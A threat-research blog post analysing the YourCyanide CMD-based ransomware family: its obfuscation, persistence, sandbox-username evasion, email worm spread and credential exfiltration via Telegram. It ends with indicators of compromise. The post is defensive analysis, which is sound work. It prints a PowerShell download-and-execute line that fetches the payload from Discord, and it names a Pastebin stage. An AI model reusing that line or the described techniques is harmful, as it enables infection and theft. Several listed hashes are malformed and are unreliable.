The Trend Micro Threat Hunting team recently analysed a series of CMD-based ransomware variants with a number capabilities such as stealing user information, bypassing remote desktop connections, and propagating through email and physical drives.

In this blog entry, we will analyse YourCyanide, the latest variant of the CMD-based ransomware family that started with GonnaCope. YourCyanide is a sophisticated ransomware that integrates PasteBin, Discord, and Microsoft document links as part of its payload download routine. YourCyanide contains multiple layers of obfuscation and takes advantage of custom environment variables and the Enable Delayed Expansion function to hide its activities. As part of its evasion strategy, YourCyanide will also pass through different files, downloading the succeeding files via Discord and Pastebin with each step before eventually downloading the main payload.

Note that the ransomware is still currently under development, so some portions of the routine — like the actual encryption portion — are not finalised (YourCyanide currently renames the files under specific directories, but does not encrypt anything).

The earliest sample of this ransomware, known as GonnaCope, was found by Twitter user Petrovic in April 2022. This variant possessed the ability to overwrite its victim's files — however, this was limited to the current directory in which the ransomware was being executed.

Upon checking the latest variant of this malware, we observed that the malware author was sending messages to all users in the compromised network notifying them of the infiltration. Along with this, another message was sent stating that "Kekware and Kekpop were just the begining" — indicating that the author was preparing a more sophisticated variant of the original ransomware.

Figure 2. A message warning victims of potentially more sophisticated variants of the ransomware

Table 1 shows when the additional variants of the original CMD/BAT-based ransomware were uploaded to VirusTotal.

Date earliest sample was uploaded to VirusTotal	Ransomware sample
07 Apr 2022	GonnaCope
07 May 2022	Kekpop
11 May 2022	Kekware
13 May 2022	YourCyanide

Table 1. CMD-based ransomware samples and their date of upload to VirusTotal

YourCyanide technical analysis

Infection flow

Figure 4. Exfiltration of stolen information

Arrival

It initially arrives as an LNK file that contains the following PowerShell script for downloading the "YourCyanide.exe" 64-bit executable from Discord and executing it:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "(New-Object Net.WebClient).DownloadFile('hxxps://cdn.discordapp.com/attachments/974799607894769704/975527548983341056/YourCyanide.exe', 'YourCyanide.exe')" start YourCyanide.exe"

Figure 5. LNK file containing the shellcode

This 64-bit executable file creates and executes a CMD file with the filename YourCyanide.cmd.

Figure 6. Creating and executing YourCyanide.cmd

The dropped YourCyanide.cmd file contains a script downloaded from Pastebin that is saved using the same filename (YourCyanide.cmd).

Figure 7. Code snippets from the YourCyanide.cmd file

The ransomware will create a registry key in HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce for cleanup purposes. It then runs advpack.dll to delete the folder containing the malicious CMD file to remove traces of the downloader from the machine.

Figure 8. Creating a registry key for cleanup

Analyzing YourCyanide.cmd

The downloaded script file contains 10 layers of obfuscated code, with each layer being needed to deobfuscate the succeeding layer. It takes advantage of the Enable Extensions and Enable Delayed Extensions commands, causing variables within a batch file to be expanded at execution time rather than at parse time.

The malware uses following format for its obfuscation technique:

%parameter:~index of character, number of characters to take%

%Kesik:~19,1%, will return 1 character from the index value 19 of parameter Kesik

Figure 9. Code snippets showing Enable Extensions and Enable Delayed Extensions commands

Upon execution, YourCyanide sets its file attributes as hidden and as a system file, then launches five maximised Command Prompt windows.

Figure 10. Launching five maximised Command Prompt windows

It will then try to add a user "session" to the Administrators group using the net localgroup command.

Figure 11. The net localgroup command being run

It also creates an autostart mechanism for persistence by creating a registry key in HKLM\Software\Microsoft\Windows\CurrentVersion\Run and then copying itself to the Startup directory. It also disables Task Manager by modifying its registry entry.

Figure 12. Code snippet showing YourCyanide creating a registry key and copying itself to the Startup directory for persistence.

It then checks if %SystemDrive%\AutoExec.bat exists, and if so, it deletes the original and then copies itself and sets the file to read only, hidden, and as a system file.

It also avoids machines with the following usernames, some of which, according to our research, are usernames used by malware researchers and sandbox systems — implying that the malware author is noting which machines should be evaded:

a.monaldo
George
george
help
karolisliucveikis
Soumy
guent

After checking the username of the infected machine, it drops and executes a batch file in UserProfile\Documents\black.bat. This batch file is responsible for continuously opening the Blank Screen Saver file, which renders the machine inaccessible while the malware is running.

Figure 13. Dropping and executing the batch file

YourCyanide also terminates several services and security applications by concatenating variables to form the strings "net stop," "norton," "symantec," and "McAfee."

Figure 14. Code snippet showing YourCyanide stopping services and security software

It then swaps the mouse button using the SwapMouseButton Export function of the user32.dll file.

After terminating applications, it renames files from the following directories to <random number>*<random number>.cyn and overwrites its contents to a random number using a built-in variable in CMD shell called %random%.

%MyDesktop%
%MyDocuments%
%MyMusic%
%MyPictures%
%MyVideos%
%Downloads%

Although no actual encryption is being performed, users will still be heavily inconvenienced due to their files being renamed — especially for those with large amounts of files in these particular folders. Furthermore, since the malware is still currently under development, it’s likely that the malware authors are still finalising the encryption portion of the routine.

It then creates the following ransom notes and drops them into %MyDesktop%:

YcynNote.txt
other.txt

Figure 15. The ransom notes dropped by YourCyanide (including the warning shown in Figure 2)

It features two instances in which it copies itself to batch files and then appends the malicious code (shown in Figure 16) to win.ini and system.ini.

Figure 16. The malicious code that are appended to win.ini and system.ini

After performing its routine, it deletes the black.bat file in the %MyDocuments% directory, which is responsible for rendering the machine inaccessible. Deleting the file will stop the blank screen saver file from continuously opening.

Figure 17. The black.bat file responsible for rendering the infected machine inaccessible

Lateral movement

YourCyanide is also capable of spreading via email and to different drives. It creates two VBScript files, mail.vbs and loveletter.vbs, that send an email using the following subjects (with itself as an attachment):

I Have a crush on you
Check This Out

It then copies itself to the following drives or directories:

D:
E:
F:
G:
H:
%UserProfile%

Bypassing remote desktop connections and firewalls

YourCyanide enables Remote Desktop Connection (RDP) by using the netsh commands shown in Figure 18.

Figure 18. Using netsh commands for RDP connection

The ransomware opens multiple local ports by adding firewall rules for Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) connections via the netsh advfirewall function.

It then downloads and executes another CMD file (ycynlog.cmd) from hxxps://pastebin[.]com/raw/2K5m42Xp.

Exfiltration of stolen information

The ycynlog.cmd file is responsible for the collection and exfiltration of stolen information from the compromised machine. Like the main file, it also features multiple layers of obfuscation. Upon execution, the file hides itself and creates its autostart mechanism by producing a registry key in HKLM\Software\Microsoft\Windows\CurrentVersion\Run, and by copying itself to the Startup directory.

The malware uses the Telegram chatbot API to exfiltrate the stolen information and sets it to variable "Webhook"

Figure 20. Using the Telegram Chatbot API for data exfiltration

It downloads another executable from Discord (GetToken.exe). Running this executable creates the file MyTokens.txt, which contains stolen access token data from different applications such as Chrome, Discord, and Microsoft Edge.

It also collects the following machine information and stores it in userdata.txt:

IP addresses
MAC addresses
CPU Information
Memory Size
Partition information
System specifications
OS product key
Currently running processes

Both Tokens.txt and userdata.txt will then be sent via Telegram chatbot API using the curl command.

We also discovered that YourCyanide exfiltrates Minecraft-related credentials.

Figure 22. Exfiltrating Minecraft-related credentials

Finally, it downloads another executable from Google Docs and executes it using the parameter "/stext ForME.txt". ForMe.txt will then be sent to the Telegram chatbot. While the Google Docs link is currently inaccessible, and therefore a sample can't be sourced, we noticed that it is run using the same parameter as the sample "passwords.exe," which is also used by the earlier Kekpop variant. The parameter "/stext" is employed when executing the file, which is similar to the WebBrowserPassView application used to retrieve credentials stored by various web browsers such as Internet Explorer (Version 4.0 - 10.0), Mozilla Firefox (all versions), Google Chrome, Safari, and Opera.

Figuring 23. Downloading the executable from Google Docs

The file created from executing passwords.exe contains saved passwords that are stored in Google Chrome.

Figure 24. The file created from executing passwords.exe

Avoiding usernames

Of the usernames this malware avoids, three in particular stand out. Namely: a.monaldo, karolisliucveikis, and soumy. Upon further research, we discovered that these are usernames from sandbox environments.

a.monaldo

The username of the sandbox machine used by Hunter Yomi

karolisliucveikis

The username of the sandbox machine used by PCRisk

soumy

Variant Comparison

The team analysed these CMD-based ransomwares and came up with the following table that compares each variant and their differences. One notable difference is that GonnaCope, the earliest variant, does not collect user credentials from web browsers and list of applications, and does not enable RDP connections. Furthermore, it does not execute black.bat, the file that temporarily causes the machine to become inaccessible while the malware executes its payload. We also observed that the BTC address used by GonnaCope is different from the BTC address of the succeeding variants and it contains a different ransom note format. The variants also differ in their delivery — shifting between arriving as an archive, executable files, or LNK files that drop the CMD-based ransomware. The payloads are also located in different parts of the chain, with some being found in the main CMD file, while others are found in files that are downloaded from Pastebin and Discord.

Behavior	GonnaCope	Kekware	Kekpop	YourCyanide
Creates auto-start mechanism	Yes	Yes	Yes	Yes
Disables task manager	Yes	Yes	Yes	Yes
Checks the username of the machine	No	Yes	Yes	Yes
Creates and executes black.bat to continuously turn on Blank Screen Saver	No	Yes	Yes	Yes
Stops services	Yes	Yes	Yes	Yes
Terminates applications	Yes	Yes	Yes	Yes
Swaps mouse buttons	Yes	Yes	Yes	Yes
Renames files	GonnaCope.cope random.cope	<Random>.<file extension>.<Random>.cyn	<Random>.<file extension>.<Random>.kekpop	<Random>.<file extension>.<Random>.cyn
Gathers a list of installed applications	No	Yes	Yes	Yes
Collects machine information	Yes	Yes	Yes	Yes
Collects token access data	Yes	Yes	Yes	Yes
Collects passwords saved in web browsers	No	Yes	Yes	Yes
Sends an email with a copy of itself as an attachment	Yes	Yes	Yes	Yes
Subject of sent email	Is this you? Here is that document you needed	I Have a crush on you Check This Out	I Have a crush on you	I Have a crush on you Check This Out
Copies itself in drives	Yes	Yes	Yes	Yes
Enables RDP connection	No	Yes	Yes	Yes
Ransom note message	Your files are unusable pay $100 in bitcoin to bc1qlly4puaz7pz3zmph8n2d620jc2j60qf4ve5qll to get your files back or allow it into outlook for a decryption key	Q: What happened to my files A: They got encrypted by kekware. Q: how can i get them back A: You can get them back by paying $500 in bitcoin to this btc wallet bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf. Q: What happens if i dont pay A: You will never get your files back.	Q: What happened to my files? A: They got encrypted by kekpop. Q: how can i get them back? A: You can get them back by paying $500 in bitcoin to this btc wallet bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf Q: What happens if i dont pay? A: You will never get your files back. Q: Is this related to kpop? A: No fuck kpop	Q: What happened to my files? A: Oops! your files have been encrypted by YourCyanide. . Q: how can I get them back? A: You can get them back by paying $500 in bitcoin to this btc wallet bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf. . Q: What happens if I dont pay A: You will never get your files back. . Q: How can I contact you A: contact at yourcyanide.help@gmail.com ++++++++++++++++++++++++++++++++++++++++++++ RAndOm Files have been encrypted
Other messages			kekpop is on your network	Kekware and kekpop were just the beginning
BTC wallet used	bc1qlly4puaz7pz3zmph8n2d620jc2j60qf4ve5qll	bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf	bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf	bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf

Conclusion

The continued use of heavily obfuscated script results in very low detections for these CMD-based ransomware, making it easier to compromise their victims’ machines. Even if the technique is not new, the use of multilayer custom environment variables for obfuscation is highly effective in avoiding detection. These ransomware variants are also capable of downloading multiple payloads, performing lateral movement via emails, and using Discord, Pastebin and even Microsoft document links.

Figure 28. Low detections of CMD-based ransomware

From our analysis, we are able to infer that the malware author is actively monitoring the reports created by malware researchers by taking note of the usernames found in their sandbox logs and reports, and including them in the evasion list of usernames and machines that is part of the initialisation process of the malware being used.

Ransomware variants that possess multiple capabilities — such as the one analysed in this blog entry — are gaining popularity. While YourCyanide and its other variants are currently not as impactful as other families, it represents an interesting update to ransomware kits by bundling a worm, a ransomware, and an information stealer into a single mid-tier ransomware framework.

It is also likely that these ransomware variants are in their development stages, making it a priority to detect and block them before they can evolve further and do even more damage.

Trend Micro solutions

A multilayered approach can help organisations defend against ransomware attacks using security technologies that can detect malicious components and suspicious behaviour.

Trend Micro Vision One™ provides multilayered protection and behaviour detection, which helps block suspicious behaviour and tools before the ransomware can do any damage.
Trend Micro Cloud One™ Workload Security protects systems against both known and unknown threats that exploit vulnerabilities through virtual patching and machine learning.
Trend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block malicious emails that can serve as entry points for ransomware.
Trend Micro Apex One™ offers automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring endpoint protection.

Indicators of Compromise

GONNACOPE
File	SHA256	Detection
GonnaCope.Bat	ab71472e5a66740369c70715245a948d452a59ea7281233d6ad4c53dfa36b968	Trojan.BAT.GONNACOPE.A
GonnaCope.Bat	0dff760288b3dfebc812761a2596563e5f0aea8ffc9ca4a4c26fa46e74311122	Trojan.BAT.GONNACOPE.THEOEBB
GonnaCopeDL	f9fdfb0d4e2d2ea06coe9222280cd03d25c9768dfa502b871846153be30816fd3	Trojan.MSIL.GONNACOPE.A
GonnaCopeCryptor	2987b5cacc9de6c3a477bd1fc21b960db3ea8742e3b46906d134aa8b73f17280	Ransom.MSIL.GONNACOPE.YXCEE
GonnaCope	7388722c3a19854c1ccf19a92798a7cef0efae538e8e8ecf5e79620e6a49cea7	TrojanSpy.MSIL.GONNACOPE.A
GonnaCopeRansNote	7edb2d152d8744343222b1b93ff846616fc3ca702e96c7e7a3663d2d938d8374	Ransom.MSIL.GONNACOPE.A.note
mail.vbs	26bde18048c32f6612d8d76b8696b2coe59db227913dccd51f696b51640ee11e9	Worm.VBS.GONNACOPE.A
msg.vbs	ca84abd94b65d69ee8d26ffc3cc63a5a0886136e63d405ac293fefecc1d2ff3a	PUA.VBS.GonnaLoop.A
msgbox.vbs	d12e08e5dd94021dfa59d36d3adfe7f47df180023a04be781fa7695adc5ccc54	PUA.VBS.GonnaLoop.A
nokeyboard.reg	a029ae77eced03e515a2acb0ee8ebecf3aebea402e441beef1615e3488234f8e	PUA.Win32.Disabler.A
Readme.txt	9c39b7535b527df3b70800562bad98dc2e046de321fae3914dab896eda753cf38	Ransom.Win32.GONNACOPE.YXCEW.note
downloader.vbs	45189864b6ff6d844d27b59123d2cd461f539d42b362e60e49da50119f0b7083	Trojan.VBS.GONNACOPE.A

KEKPOP
File	SHA256	Detection
Arrival	c8d6298f5ef09a324bb6afc7bb4550857fbd0fcbaea2b315b4f00d78bcc6a262	Trojan.BAT.KEKPOP.THEACBB
Arrival	296ba1469d072c37c6361fae80ba396a92f6461b9562103a3b5a20841d0757722	Trojan.BAT.KEKPOP.THEACBB
Main File	bfd9336deeb399f412c51f8f6797e6b5dc81afa1f1638ab937a28df733a78c0f	Ransom.BAT.KEKPOP.THEAABB
	f8a0d9ea41c2b9082f9aebbc7e337b22d1092dd307ccd34d71fdbd56fd94a41d
	1e791e8511ac29bf4fd2a289ed35bb24151a7b0bfa3ab9854b2a586ede050a54
	d2d25dee61b17133415b4856412f20134823177effccd53a1f14677d372a4b56
Dropped BAT File 1		Trojan.BAT.KEKPOP.THEACBB
Dropped BAT File 2	9b087a352fcb0a61545dbd68f7dfa32e0e15f98ca1547207d9ff918881ff5c75	TrojanSpy.BAT.KEKPOP.THEACBB
Dropped BAT File 3	7fed00a9456b6945813f46294d2f587e7486b38917a8818a77774a2a8e2cfe9b	Trojan.BAT.KEKPOP.THEACBB
Dropped Text File		Ransom.BAT.KEKPOP.THEACBB.note
Dropped HTML File		Ransom.HTML.KEKPOP.THEACBB.note
Passwords.exe	53043bd27f47dbbe3e5ac691d8a586ab56a33f734356be9b8e49c7e975241a56	HackTool.Win32.NirsoftPT.SM
GetToken.exe	6ad08fae301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983	Trojan.MSIL.TOKENSTEALER.YXCES
kekpopdicord.exe	e5f589027e859e8bedb2d5fbecff37dcf7bcf7e4af6671c1c0c9aac9b6712913	Trojan.Win64.KEKPOP.YXCET
		Trojan.BAT.KEKPOP.YXCEZ

KEKWARE
File	SHA256	Detection
Arrival	3262ece43e7135c9ed6788588bae269ed75db800964d48cfb762542e0d003259	Trojan.PS1.KEKPOP.YXCEST
Arrival	23269070507a70c34a4e219f9be19943211ed38eec4a9coe2b3a49bf76676a5e3	Trojan.PS1.KEKPOP.YXCEST
Main File	e0946a55e9cbdb3485f154f72994bad765b74ba280a2149485af113503b7dc78	Trojan.BAT.KEKPOP.YXCEST
YcynNote.txt	602533e3c67a248e4dc152fa266a372dd2b2d82ff68fdc17c1591ecc429147bc	Ransom.BAT.KEKPOP.YXCEST.note
rAndom.cmd	7fed00a9456b6945813f46294d2f587e7486b38917a8818a77774a2a8e2cfe9b	Trojan.BAT.KEKPOP.THEACBB
cynlog.cmd	9b087a352fcb0a61545dbd68f7dfa32e0e15f98ca1547207d9ff918881ff5c75	TrojanSpy.BAT.KEKPOP.THEACBB
Passwords.exe	53043bd27f47dbbe3e5ac691d8a586ab56a33f734356be9b8e49c7e975241a56	HackTool.Win32.NirsoftPT.SM
GetToken.exe	6ad08fae301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983	Trojan.MSIL.TOKENSTEALER.YXCES
black.bat	07fab8134ff635078cab876dba1e35c536936d193a3667637e0561c6efbb0a85	Trojan.BAT.KEKPOP.YXCEST
loveletter.vbs	f0afc40bec9453d38f2cd7d70e25bc76797839c2d28180904295639080013416	Worm.VBS.MASSMAIL.YXCEST
mail.vbs	080c4f412087aa3b652e8777ea00c801424ad6c4326bf020b9c264440e37c868	Worm.VBS.MASSMAIL.YXCEST
fasdgfsdga.cmd	56622656231060b6401dcea515953d517fd9212b8de66c33c4847840aa958c83	Trojan.BAT.POWLOAD.TIAOELC

YOURCYANIDE
File	SHA256	Detection
LNK	31655244d3b77ae661f10199cd823f54c473d92a88ae892ee1b75bc5794482ad	Trojan.LNK.KEKPOP.YXCEST
	9e973f75c22c718c7438bc1d4614be11ae18e2d5140ecc44c166b5f5102d5fbe	Trojan.LNK.KEKPOP.YXCERT
	c5d842735709618ee4f2521c95bf029a0690c3cbe5f7a06a916f633ebe09dd50	Trojan.LNK.KEKPOP.YXCERT
	f9a2c524c270d581b83c010136402c00623bb36b2dd7758ea5e59c9369fa7649	Trojan.LNK.KEKPOP.YXCERT
Win64 EXE Dropper	8249d6e886a97aec60d35d360773e76c6630d822817dabe1c7674a0b51965669	Trojan.Win64.KEKPOP.YXCEST
	d51538d8da12af8ae36f95b645e76218e4fd61ab433504a3900c14942160446c	Trojan.Win64.KEKPOP.YXCERT
	6a645f72acf1d6c906e8c844e4e8b3fc92c411bf69937cfe7069df2cc51b8a4e	Trojan.Win64.KEKPOP.YXCERT
	2f2fac2c91268a9b31401633b63a374242e46919dc21106466c6c05bab3coe3f8	Trojan.Win64.KEKPOP.YXCERT
	a180c31666788fb6a7da421a743bb1c487099297aec06f2bdd841f342021f3763	Trojan.Win64.KEKPOP.YXCERT
Downloader of the payload	b43d1af1abeef8b552f0b362b2162c3a940a843f5474518c665e145b3aa01ace	Trojan.PS1.KEKPOP.YXCEST
Downloader of the payload	6e33a2c56b7b32be8e99a15920cf179b4e7aa62eaef8496ace67261543569c25	Trojan.LNK.KEKPOP.YXCERT
Main File (YourCyanide.cmd)	6ab0e2e13c32b18b06b9b93b1fae607a7e04a5c0ba09816c36fba1573a47ded91	Trojan.BAT.KEKPOP.AB
	f8860coe270a2dec3ae1c51ff2c9aea5efe0015d519ebac4ca4c1ac0d97e73323	Ransom.BAT.KEKPOP.YXCERT
	8f0dbf9a6841ced62d7f5c130f420bd5a2b39141097fefba9727034d1bf3b402	Ransom.BAT.KEKPOP.YXCERT
	67a1e573955304887d30ff924eb01ba8a60a188835d7275265ecc716360fb0cf	Ransom.BAT.KEKPOP.YXCERT
	a3523e2ba2c221593a0c16640bfeef8cd146f747fa62620cc2834e417578c34c	Ransom.BAT.KEKPOP.YXCERT
	0ed64dd6e08e5b9c9282966f439ab8881b4611052838db1ef79fabc38b8a61d2	Ransom.BAT.KEKPOP.YXCERT
black.bat	07fab8134ff635078cab876dba1e35c536936d193a3667637e0561c6efbb0a85	Trojan.BAT.KEKPOP.YXCEST
ycynlog.cmd	298c325bbc80af8b3ac77365dd7cc3f97000a8377f36937d8563ab743a92b21c	TrojanSpy.BAT.KEKPOP.YXCEST
YcynNote.txt	4e455d4b353c7cce0155coe1050afc30d064fd93c57bc6428eb3cd988ecd855f0	Ransom.BAT.KEKPOP.YXCERT.note
other.txt	a4c3412ac96061561c6cf05a259dd14e5151fae66eee115ff154d6a0366ba1a12	N/A - non-malicious component
loveletter.vbs	f0afc40bec9453d38f2cd7d70e25bc76797839c2d28180904295639080013416	Worm.VBS.MASSMAIL.YXCEST
mail.vbs	080c4f412087aa3b652e8777ea00c801424ad6c4326bf020b9c264440e37c868	Worm.VBS.MASSMAIL.YXCEST
GetToken.exe	6ad08fae301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983	Trojan.MSIL.TOKENSTEALER.YXCES
ForMe.exe		N/A
	316403043e4135474637c0e3f958e72015a08242dc2712f7635012e253cb81b2	Trojan.LNK.KEKPOP.YXCEST
	6a95f52d228316f9b48618a1c728e1c47aec71843e5b4cfb76ab3ef86dcd8cf8c	Trojan.LNK.KEKPOP.YXCEST
Read_Me.txt.cmd	77fd8fba88236d5f55bbb12dbaaa69ee7673397d8606c0c67b22coe523af818cd	Trojan.BAT.POWLOAD.TIAOELB
Main File (WinBugsFix.cmd)	40b923db9c5da6b3bfe345139c42a71e2fd124de6a2808f8cec2a979a044f191	Ransom.BAT.KEKPOP.YXCEST
	b0f7c2021c00a1d495f408295d161befa3faceab02d9c4047cee4904db6c1272	Ransom.BAT.KEKPOP.YXCEST

YourCyanide: A CMD-Based Ransomware With Multiple Layers of Obfuscation

YourCyanide technical analysis

Infection flow

Arrival

Analyzing YourCyanide.cmd

Lateral movement

Bypassing remote desktop connections and firewalls

Exfiltration of stolen information

Avoiding usernames

Variant Comparison

Conclusion

Trend Micro solutions

Indicators of Compromise

Authors

Resources

Support

About Trend

Resources

Support

About Trend

The Americas

Middle East & Africa

Europe

Asia & Pacific